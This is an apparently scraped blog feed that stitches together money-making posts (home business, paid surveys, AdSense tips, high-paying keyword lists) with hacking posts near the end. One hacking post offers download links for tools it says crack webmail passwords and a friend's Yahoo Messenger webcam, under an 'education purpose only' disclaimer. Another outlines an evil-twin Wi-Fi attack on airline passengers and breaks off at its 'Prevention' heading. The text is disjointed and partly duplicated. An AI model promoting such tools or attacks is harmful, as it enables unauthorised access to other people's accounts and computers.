</div><span style="color: #006699; font-family: Verdana;"><div align="justify"><span style="color: #ff854a; font-size: x-small;"><b><span class="Apple-style-span" style="font-size: x-large;">How To Start Your Home Business, Once and For All, This Year</span> </b></span><span style="color: #006699; font-size: x-small;"><br />
</span><span style="color: #006699; font-size: x-small;"><span style="color: grey;"><br />
</span><br />
<br />
You've thought about it for awhile now. There's a good chance you've rationalized it and said, "Next year I'll get my own business started." Guess what? It's next year, and there's no better time than the present to get your home business started.<br />
<br />
<b>So What's The Secret? </b><br />
<br />
Is there a secret to starting and making money with a home business? What about making lots of money? Are there just a few people out there that can be successful? Or can anyone make it happen? In my research of successful home-based business owners, I've found two essential ingredients to success: having a good attitude and lots of determination. Call me crazy, but we can all have these and it isn't going to cost us a dime.<br />
</span><br />
</div><div align="justify"><span style="color: #006699; font-size: x-small;"><b>But I Don't Have The Money To Start A Home Business </b><br />
<br />
We are often caught up with the situations we find ourselves in, and see no possible way to start a home biz. Maybe you're broke with barely enough money to survive, let alone to start a home business. You could be a single mom raising your family all by yourself. Maybe you've been burned by one to many work-at-home scams and have given up on the idea that you can make a home business work.<br />
<br />
It's easy to tell yourself that you could never start, let alone run a home business because of this or that reason. It's easy to rationalize "Well those people who are super successful, they probably had a bunch of money to start their business with and they probably knew all the right people." Well, that's usually not the case. Any self-employed person will tell you how hard it really was to make their business a success. It always comes down to lots of hard work!</span><br />
</div><div align="justify" style="margin-bottom: 0px; margin-top: 0px;"><span style="color: #006699; font-size: x-small;"><b>What Are You Focused On? </b><br />
<br />
Many years ago I was teaching my youngest daughter to ride her bike without training wheels. She was riding on the side of the road, and was very nervous about running into the curb. Every time she would start to peddle, she'd immediately look at the curb, and sure enough, she'd head straight for it. I explained to her, "Look at where you want to go, not where you don't want to go." It's funny how when you look straight ahead, the bike goes straight ahead, but when you focus on where you DON'T want to go, you end up there.<br />
<br />
The mind is a wonderful machine and it can be our best friend. If you constantly tell yourself that you can be a success, you can make money doing what you love; your mind will find a way to make it happen. A quote by Edward Vernon Rickenbacker says, "I believe that if you think about disaster you will get it. Brood about death and you hasten your demise. Think positively and masterfully with confidence and faith, and life becomes more secure, more fraught with action, richer in achievement and experience."<br />
<br />
<b>Make Your Dreams Come True - Make Money Doing What You love</b><br />
<br />
When you think about the type of business you want to start, think about what it is you love to do. Try not to focus on a business because you are told about all the money you can make. Instead look at what you enjoy doing. What you are already naturally gifted at doing.<br />
<br />
All businesses take time to grow and make money. Even the ones you are told will make you a ton of money. Wouldn't you rather work hard at something you enjoy to make a living?</span><br />
</div><div align="justify" style="margin-bottom: 0px; margin-top: 0px;"><br />
</div><div align="justify"><span style="color: #006699; font-size: x-small;"><br />
<b>It's Up To You </b><br />
<br />
No matter where you are coming from, it's your attitude and determination that will ultimately decide the fate of your home business. If you want to work-at-home badly enough, then you need tell yourself on a daily basis that you will find a way to make it happen, and you will be a success at it. Do this and your business will not only get started, but is will also grow and thrive. With a positive attitude and determination you can move mountains!</span><br />
</div><div align="justify"><span style="color: #006699;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699;"><span class="Apple-style-span" style="font-size: x-large;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #006699;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: #666666; font-size: 12px;"><span style="font-size: x-small;"><span style="color: #ff854a;"><b><span class="Apple-style-span" style="font-size: x-large;">Paid Surveys Online - An easy way to make money online?</span> </b></span><br />
</span></span></span></span><br />
</div><span style="color: #006699;"><div align="justify"><span style="font-size: x-small;"><span style="color: #336699;"><span style="color: grey;"><br />
</span>Paid surveys are being promoted as an easy way to make money online. Some ads promise you up to $250 per hour for taking paid surveys. Are they realistic? Can one really expect to earn that much money from online paid surveys? Let us find out the answers to these questions.<br />
<br />
Such advertisements are usually put up by paid survey database companies like Surveyscout. They charge you for giving access to a database of market research companies, often in the range of $30 to $60. They typically have 400 to 500 survey companies in their database.<br />
<br />
Is it worth paying these companies to get access to such a database? Whatever information you get from these companies, you can get for free on the internet on many free online survey sites. Secondly, these survey database companies do not send any surveys by themselves, and you have to join each market research company in their database individually to get any surveys. In addition, most of the survey companies in their databases are good for nothing. Only about 40 to 50 survey companies are really worth joining.<br />
<br />
What does this mean? If you are planning to try online surveys, you never have to pay anyone. You can get the list of the best survey companies for free on the internet. You can join them and get started.<br />
<br />
Now let us take a closer look at on the rewards offered by paid online surveys. Survey companies can be divided into those which reward you with cash for each survey, those that give you points which can be redeemed for cash, and those which enter you into sweepstakes or prizedraws.<br />
<br />
Survey companies that pay cash give $1 to $20 or more per online survey depending on many factors. This group includes many of the best survey sites like American Consumer Opinion Panel, Surveysavvy, Ciao Surveys, Greenfield online(Gozing) and Pinecone Research. You can expect to get 1 to 4 surveys per month from each site.<br />
<br />
Surveys that reward you with points let you accumulate reward points which you can later redeem for cash or gifts. Some of the most reputed market research companies like Globaltestmarket, Opinion Outpost, NFO Mysurvey and Lightspeed Research reward you in this way.<br />
<br />
Yet other companies enter you into draws for cash or gifts as reward for taking surveys. Although many people don't like this form of reward system, your chances of getting the prize is quite good as the pool to select the prize winners is usually small. Some good survey companies that follow this reward system are Synovate, NPD Research, NOP World (Surveys.com), ECN Research and Nielsen Netratings.<br />
<br />
Another important factor which determines how much you can earn from online surveys is your profile, particularly your country. Generally residents of the USA and Canada can expect to make more money from paid surveys, as there are more market research companies operating in these countries. Also they get more frequent surveys. However, participants from other countries can also hope to make some good extra money from paid online surveys.<br />
<br />
All said and done, the maximum earnings an average person can expect from doing paid surveys is not more than $200 to $300 per month. This can be a good source of extra income for some people. But the claims that paid surveys can make you rich or replace your real job are largely unfounded. Hence, it is always best to stay with free paid surveys. </span></span><br />
</div><div align="justify"><span style="color: #336699;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="justify"><span style="color: #336699;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: #323131; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 19px;"></span></span></span><br />
</div><span style="color: #336699;"><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="bodytxt">Adsense is the real online money making scheme. Thousands of people are earning tons of dollars everyday through Adsense program. If you have a Adsense account and when your earning is in progress, all of a sudden your Adsense account may be disabled. You may be innocent but be careful about the internet enemies. To save you Adsense account from the enemies you have to combat against them. Self clicking and continuous clicking from same IP on the Adsense ads are strictly prohibited and these clicks are treated as invalid clicks. If you can not stop the invalid clicks, your Adsense account may be disabled.</span><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="bodytxt"><br style="clear: both;" />Once your Adsense account is disabled, all of your earning accumulated in the Adsense account will be forfeited. So you have to be vigilant every moment to save your adsense account. I have already discussed about how to deal with Sabotage Clicks and Accidental Clicks. Here I would like to highlight one important point. If clicks are generated from a unknown site how you will save your account?You should use channel for all of your sites.</span><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="bodytxt"><br style="clear: both;" />Advantage of adding url channel is to identify from which site the invalid clicks have been generated and you can report to the Adsense team about the affected site with date and time and url. Sometime you may notice that multiple clicks have been generated but you are unable to identify the site where the clicks were made, even you have added urls of all of your sites. The true fact is that the enemy has made clicks on the Adsense ads which is made with your adsense pub No. and placed on a site created by enemy. In this case you have to use “allowed sites”. Go to your Adsense account then click on “Allowed sites” and put all of your urls so that the page impressions and clicks generated from a site which is not belong to allowed sites will not be counted.</span><br />
</div></span><br />
</span><br />
<div align="justify"><span style="color: #006699; font-size: x-small;"><br />
<span style="color: grey;"><span style="color: #006699;"><br />
</span></span></span><span style="color: grey; font-size: x-small;"> </span><br />
</div><div align="justify"><span style="color: grey;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #323131; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 12px;"></span></span></span><br />
</div><span style="color: grey;"><h1 style="color: #c93900; font-size: 1.7em; line-height: 1.7em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; text-decoration: none;">Earn through Google Adsense</h1><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; line-height: 19px;"><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="bodytxt">Adsense is the real online money making scheme. Thousands of people are earning tons of dollars everyday through Adsense program. If you have a Adsense account and when your earning is in progress, all of a sudden your Adsense account may be disabled. You may be innocent but be careful about the internet enemies. To save you Adsense account from the enemies you have to combat against them. Self clicking and continuous clicking from same IP on the Adsense ads are strictly prohibited and these clicks are treated as invalid clicks. If you can not stop the invalid clicks, your Adsense account may be disabled.</span><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="bodytxt"><br style="clear: both;" />Once your Adsense account is disabled, all of your earning accumulated in the Adsense account will be forfeited. So you have to be vigilant every moment to save your adsense account. I have already discussed about how to deal with Sabotage Clicks and Accidental Clicks. Here I would like to highlight one important point. If clicks are generated from a unknown site how you will save your account?You should use channel for all of your sites.</span><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="bodytxt"><br style="clear: both;" />Advantage of adding url channel is to identify from which site the invalid clicks have been generated and you can report to the Adsense team about the affected site with date and time and url. Sometime you may notice that multiple clicks have been generated but you are unable to identify the site where the clicks were made, even you have added urls of all of your sites. The true fact is that the enemy has made clicks on the Adsense ads which is made with your adsense pub No. and placed on a site created by enemy. In this case you have to use “allowed sites”. Go to your Adsense account then click on “Allowed sites” and put all of your urls so that the page impressions and clicks generated from a site which is not belong to allowed sites will not be counted.</span><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #323131; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 12px;"></span><br />
</div><h1 style="color: #c93900; font-size: 1.7em; line-height: 1.7em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; text-decoration: none;">Adsense Tips</h1><div><span class="Apple-style-span" style="color: #323131; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;">You have taken much pain to make your blog. You may want earn money through your blog. For this you have to participate in Google Adsense programme. Google Adsense is the best way for your website to display relevant Google Ads and earn money. Adsense delivers relevant Ads that are targeted to your site and your site content. For participating in Google Adsense programme open an account for <a href="http://www.google.com/adsense" style="color: #c93900; cursor: pointer; text-decoration: none;">adsense</a>. The programme is free and google will pay you for valid clicks on the ads. After <a href="https://www.google.com/support/adsense/bin/answer.py?answer=" style="color: #c93900; cursor: pointer; text-decoration: none;">opening adsense account</a>t you will get a message from google. Read carefully the google programme policies. You have to do a simple work. Just open your account copy a block of HTML and targeted ads and paste it in the right place in your website template. You may interested in how much will you earn through the programme. In fact advertisers pay only when users click on ads. You will receive a portion of the amount paid for clicks on google ads on your website.<br style="clear: both;" />Learn <a href="https://www.google.com/support/adsense/bin/answer.py?answer=" style="color: #c93900; cursor: pointer; text-decoration: none;">adsense support</a>. You will be able to see the total number of impressions, ad clicks, click through rate, effecteive CPM and your total earning through your report tab. You may visit adsense <a href="https://www.google.com/support/adsense/bin/topic.py?topic=" style="color: #c93900; cursor: pointer; text-decoration: none;">adsense help</a>.</span></div></span><br />
<div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #323131; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 12px;"></span><br />
</div><h1 style="color: #c93900; font-size: 1.7em; line-height: 1.7em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; text-decoration: none;">How to make more money from Google Adsense?</h1><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; line-height: 19px;"><div class="entry-body" style="overflow-x: hidden; overflow-y: hidden; padding-top: 0.5em; text-align: left !important;"><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;">This is the main tips for you which will be the best idea to make more money. This step teaches you to show google ads in maximum eye-catching places in the page. The ads will be shown every possible area where your web site visitors’ mainly focus. More valid clicks maximize your income.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><strong>Optimization tips to make more valid clicks:</strong><br style="clear: both;" /><strong>1. Place ads on top of your page: </strong>The visitor first sees the contents of the upper part of your page. If ads will be shown top of the page above of your latest article, that may grab attention of the visitor and he/she may click on that link or ads.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br style="clear: both;" /><strong>2. Just below of each article:</strong> Though the visitor didn’t click the ads and start reading your article, he/she may clicks on ads if it will be placed just below of the article.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br style="clear: both;" /><strong>3. On the bottom of the page:</strong> If the visitor reaches on the bottom of the page, there will be no options for him/her. If ads are shown on the bottom of the page, he/she may clicks on ads as there will be no option.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br style="clear: both;" /><strong>To show ads on just below of article and bottom of the page on blogger, follow the instruction:</strong><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;">1. Sign In to the blogger.com<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;">2. Click "Template" link. There you will see a text area with HTML source code of your site.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;">3. Skip or don't see anything above tag. Some lines below tag<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;">4. Some lines below of tag, you will see the code as like the following format:<br />
</div><strong></strong><div class="”adsense”………………….." style="clear: right; float: left;"><br style="clear: both;" />…………………<br style="clear: both;" /></div>5. Copy the code. Copy the code from <div class="”adsense”…." style="clear: right; float: left;">to</div>.<br style="clear: both;" />6. Find<div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div>7. Paste code on the location as shown below:<br style="clear: both;" /><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div><br style="clear: both;" />Paste code in this space<br style="clear: both;" />8. Click “Preview” button on the bottom of the page to see exact view your page after pasting the code. 9. If you won’t see any error odd view on preview click “Save Template Changes” otherwise click “Clear Edits” and follow the process from step 4 to step 6 as mention above. 10. Wait until you get Settings saved successfully message Prohibition on Google Adsense: 1. Don't click on ads from your site your self.<br style="clear: both;" />2. Don't inspire anyone directly to click on ads through your site.<br style="clear: both;" />3. Don't use any auto hits and clicks software to click on ads<br style="clear: both;" />4. Don't place ads code at contentless or hidden content pages.<div class="clear" style="clear: right; float: left;"></div></div><div class="entry-body" style="overflow-x: hidden; overflow-y: hidden; padding-top: 0.5em; text-align: left !important;"><br />
</div><div class="entry-body" style="overflow-x: hidden; overflow-y: hidden; padding-top: 0.5em; text-align: left !important;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #323131; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 12px;"><h1 style="color: #c93900; font-size: 1.7em; line-height: 1.7em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; text-decoration: none;">Top paying google Keywords</h1><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; line-height: 19px;"><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;">Here I am going to provide you the top paying key words. It is absolutely free. How much you will earn from<a href="http://www.google.com/adsense" style="color: #c93900; cursor: pointer; text-decoration: none;">Google Adsense</a> depends upon your choosing of key words for your site. You may achieve top rank in the<a href="http://www.google.com/" style="color: #c93900; cursor: pointer; text-decoration: none;">google</a> or <a href="http://www.yahoo.com/" style="color: #c93900; cursor: pointer; text-decoration: none;">Yahoo</a>. But you are disheartened since nobody visits your site. Why you are not getting traffic for your site in spite of to high ranking for a particular key words? It is very much simple, you have not selected the right key words or phrase that maximum people search for. Secondly you have selected right key words and you are getting sufficient traffic. But your earning from adsense is not upto the mark. What is the reason? The reason is that you have selected popular key words but the key words are not top paying key words or phrase. So you have to choose not only right key words but also the top paying key words for which advertisers pay good amount.Google AdSense delivers text and image ads that are targeted, relevant to the content of your site. Whenever a visitor clicks on adsense ads, the advertiser pays Google, and Google splits the revenue with you. Lear more <a href="http://blogrns.blogspot.com/search/label/Search%20engine%20optimization" style="color: #c93900; cursor: pointer; text-decoration: none;">Search engine optimization</a> , <a href="http://blogrns.blogspot.com/search/label/How%20to%20get%20inbound%20links" style="color: #c93900; cursor: pointer; text-decoration: none;">How to get inbound links</a> &<a href="http://blogrns.blogspot.com/search/label/Page%20ranking%20tips" style="color: #c93900; cursor: pointer; text-decoration: none;">Page ranking tips</a> to drive <a href="http://blogrns.blogspot.com/search/label/More%20Traffic" style="color: #c93900; cursor: pointer; text-decoration: none;">More Traffic</a> for your blog/website.Advertisers bid against each other to receive better placement in the results, and the bidding price for each keyword differs. As for example the key word “health” pay on 6 cents while keywords such as “mortgage” pay $6 or more per click. What ad will be display on your site is totally depends upon the title and first few lines of your page. So let us see the top/high paying key words.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br style="clear: both;" /><strong>Key words that bid more than $25:</strong><br style="clear: both;" />Structured settlement,Vioxx attorney,auto insurance quote ,college loan consolidation ,car insurance quote ,austin dwi ,austin dwi attorney ,san diego dui attorney ,houston criminal attorney ,san diego dui ,dwi texas ,dui attorneys ,dwi attorney ,dui attorney ,dui attorney,dui attorney ,dui lawyer ,lawyer dui ,dui lawyers, federal criminal attorney, car accident lawyer ,dwi attorney,criminal lawyers ,new york criminal attorney ,auto accident attorney, auto accident lawyer,dwi lawyer,dwi lawyer ,texas dwi law ,car accident attorney ,car accident attorney ,federal loan consolidation ,online car insurance ,term life insurance quote, cheap car insurance,student loan consolidation,auto insurance quotes ,online insurance quotes ,student loan information ,equity loan rates ,nj auto insurance ,student loan consolidation center ,debt consildation ,chase credit cards ,student loan refinancing ,discount car insurance ,life insurance quote.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br style="clear: both;" /><strong>Key words that bid $20 to $25:</strong><br style="clear: both;" />Mmotorcycle accident attorney ,washington dui ,lemon law attorney ,lemon law ,help attorney ,injury lawyers ,dallas dwi ,wrongful death attorney,mesothelioma attorney ,personal injury lawyer ,san diego personal injury attorney ,accident lawyer ,personal injury attorney,personal injury attorney ,tax attorney,tax attorney ,alaska lawyer ,minnesota dwi laws ,federal lawyer ,dallas personal injury attorney ,lawyer injury ,death lawyer ,cosmetic surgery michigan ,plastic surgery la jolla ,plastic surgery la jolla ,accutane lawsuit ,mesothelioma attorney ,mesothelioma treatments ,plastic surgery cincinnati ,pro active acne treatment ,accutane lawsuits ,auto accident attorney ,michigan auto accident ,san antonio auto ,new york auto insurance ,austin auto ,auto insurance ,mercury insurance auto ,auto nation ,auto refinance ,auto refinance loans ,prequalify loan ,loans com ,business credit report ,whole life insurance quotes ,new york auto insurance ,online mortgages ,student loan ,cheap house insurance ,low cost life insurance ,school loan consolidation ,citi credit ,manhattan mortgages ,school loans ,term insurance ,second mortgage ,credit report com ,auto ins ,consolidation ,line of credit ,landlords insurance ,low mortgage ,commercial vehicle insurance ,credit consolidation ,bad credit mortgages ,bad credit mortgages ,discount life insurance ,domain check ,buy a domain name ,Contract management software,Car accident lawyer.<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><strong>Key words that bid $1,5 to $20:</strong><br style="clear: both;" />Domain search ,dedicated server managed dedicated servers ,,domain name registrations,eu domain registration ,Donate a car,Note buyers,Cord blood,Home equity loans,Criminal attorney,Cerebral palsy,Help desk,Key words that bid $5 to $15small business software ,inventory management software ,pestpatrol ,optimization software ,webroot spy sweeper ,payroll software ,spam software ,webroot spy ,spy sweeper download ,software mirroring ,fundraising software ,software configuration management ,great plains software ,software distribution ,denver auto ,auto accident ,auto comparison ,auto loan rate ,auto ,auto glass ,auto loan ,auto loans online ,auto loans ,auto rental ,new jersey auto ,auto warranty ,gambling on line ,wynn casino ,hold everything ,online casino ,tropicana casino ,monte carlo resort and casino ,monte casino ,dedicated windows hosting ,mohaa dedicated server ,inexpensive domain ,domain name ,dedicated server web hosting ,Domain ,domain name registration search ,uk dedicated hosting server ,unix dedicated server ,cheap domain register ,dedicated sql server ,conference calling,factoring,oregon mortgage,answering service,debt consolidation,mailing lists,software escrow,tax attorney,web hosting,medical malpractice lawyer,seo optimization,debt management,data recovery,document scanning,forex,private jet,affiliate program,brochure printing,cash advance,credit report,domain name,forex,hosting,incorporate,refinance mortgage,tape data recovery,website hosting,wisconsin mortgage<br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br style="clear: both;" /><strong>Key words that bid $3 to $5:</strong><br style="clear: both;" />Accounting software,acne,art school,asic design,canada fishing,cash drawer,casino,,charity,charter yacht,computer chair,contact lenses,degree,diet,dna testing,drivers education,drug test,golf business,hair loss,hardwood floor,HGH,home insurance,military school,MLM,pay per click,people pc,projector lamp,radar detector,reverse mortgage,satellite phone,seo,steel building,voip. You can check your top search phrases report in <a href="http://www.webtrends7.com/" style="color: #c93900; cursor: pointer; text-decoration: none;">WebTrends</a> for a list of the key words that people searched for to find each page of your site.Check your words in public <a href="http://uv.bidtool.overture.com/d/search/tools/bidtool/index.jhtml" style="color: #c93900; cursor: pointer; text-decoration: none;">Overture Bid Tool</a> now.<br />
</div></span></div></span></div></span></div><br />
<div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div><div style="margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left !important;"><br />
</div></div></span><br />
</span><br />
</span><br />
</span><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com1tag:blogger.com,1999:blog-2254663475743620910.post-56708558026628200212009-10-17T09:59:00.000-07:002009-10-17T09:59:29.363-07:00hacking softwarehere are some hacking software for u? downlaod and enjoy :<br />
i'm not responsible for any hacking and cracking its only for education purpose only.<br />
<br />
<span style="background-color: black; color: cyan; font-size: large;">we<span style="background-color: #660000;"></span>bmailhack:</span> hack webmailbased hacking. eg..yahoo, gmail,hotmail, mail, live .etc<br />
downlaod: <a href="http://www.blogger.com/%20%09%20http://www.ziddu.com/download/6955091/WebMail_Hack_3_1.rar.html">webmailhack_3.1</a><br />
<br />
<br />
<span style="font-size: large;"><span style="color: #990000;">yahoo_webhack:</span></span> hacke webcam, password of your friend of yahoo massenger<br />
downlaod : <a href="http://www.ziddu.com/download/6955092/Yaho-Web-Hak.rar.html">yahoo_hack</a><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-15182252990495104442009-10-17T07:43:00.000-07:002009-10-20T01:57:34.790-07:00Wireless hacking(3)<h1 class="post-title entry-title"> </h1><h1 class="post-title entry-title"> </h1><h1 class="post-title entry-title"><a href="http://freedownloaz.blogspot.com/2008/02/wireless-hacking_19.html">Wireless Hacking</a></h1><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Wireless Hacking at an height of 30,000 feet where there is no wireless network!<br />
</div><div style="text-align: justify;"><span style="font-weight: bold;">Outline:</span><br />
As we all know travelers use their laptops in planes.This is a safe place as many flights don't provide with wireless/satellite access to internet for the passengers.Consequently,the biggest threat of security, is someone reading ur data.Wireless hacker can explore their systems without der knowledge.<br />
We all know dat for configuring connection to a wireless network in <span style="font-weight: bold;">win</span> <span style="font-weight: bold;">XP Zero Config</span>, U have to goto the network connections & adding a network 2 da preferred network, U can connect 2 a wireless signal which have have been displayed on wireless networks & upon connection,it ll automatically add dat network on a network list.Win Xp automatically connects 2 dat network every time wen it is sensed & da applicable config info is maintained in dat network <span style="font-weight: bold;">"bookmark"</span>. Laptop user is unknown wat occurs from dat point forward.Wat happens is Win Zero Config ll routinely, automatically sends probe requests into air, searches for an available network, if it find it gets connected to it, if it is not connected it sends again request for the network.<span style="font-weight: bold;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-weight: bold;">Hack:</span><br />
Suppose ur in plane & a probe requests have been sent to u , searching for da network(S), u have defined in ur network section.One more person in plane is using laptop & running a program named as <span style="font-weight: bold;">HotSpotter</span>.Dis program ll c those probe requests & compare these with a list of known <span style="font-weight: bold;">SSIDs</span>, den it turns itself into wireless access point with an matching <span style="font-weight: bold;">SSID</span> of network in ur network list.Now u have been connected to the hackers "wireless network".If the user is not using firewall the hacker can easily hack his computer & his transactions & we think we r safe..<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Check out <a href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html">here</a> for another tool used in wireless hacking.<br />
<br />
<span style="font-weight: bold;">Tools:</span><br />
</div><ul style="text-align: justify;"><li>Laptop with an wireless card which supports <a class="undefined" href="http://en.wikipedia.org/wiki/HostAp" target="_blank">HostAP</a>.</li>
</ul><ul style="text-align: justify;"><li><span style="font-weight: bold;">HotSpotter</span> (we learned abt it above) program which contains scripts 2 run DHCP (U can dis program in Auditor security collections:<a class="undefined" href="http://www.remote-exploit.org/index.php/Auditor_main" target="_blank"> http://www.remote-exploit.org/index.php/Auditor_main</a> or<a class="undefined" href="http://www.remote-exploit.org/index.php/Auditor_main" target="_blank"> http://www.remote-exploit.org</a> )</li>
</ul><ul style="text-align: justify;"><li>Choice of programs on exploiting the victims pc, once de connected to ur WLAN.Check for the diff tools of same category in Auditor security collection...</li>
</ul><div style="text-align: justify;"><br />
<span style="font-weight: bold;">Prevention:</span><br />
<b></b><br />
<b></b><br />
